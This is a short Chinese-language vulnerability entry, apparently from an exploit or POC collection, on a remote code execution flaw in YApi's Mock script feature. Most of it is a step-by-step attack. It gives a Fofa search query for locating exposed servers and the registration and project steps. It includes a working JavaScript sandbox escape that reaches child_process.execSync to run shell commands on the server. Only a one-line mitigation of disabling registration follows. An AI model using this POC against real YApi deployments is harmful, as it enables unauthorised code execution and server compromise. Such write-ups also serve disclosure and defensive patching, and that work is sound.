Yapi Mock 遠程代碼執行漏洞

漏洞描述

YApi接口管理平臺遠程代碼執行0day漏洞，攻擊者可通過平臺注冊用戶添加接口，設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態，強烈建議客戶盡快采取緩解措施以避免受此漏洞影響

Fofa:app="YApi"

默認開啟注冊功能

注冊后新建項目

添加接口

高級Mock>腳本>開啟,寫入POC并保存：

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

保存后預覽：

Yapi作者已經停止更新。臨時修復建議禁止用戶注冊，具體配置參考原文鏈接：

https://github.com/YMFE/yapi/issues/2099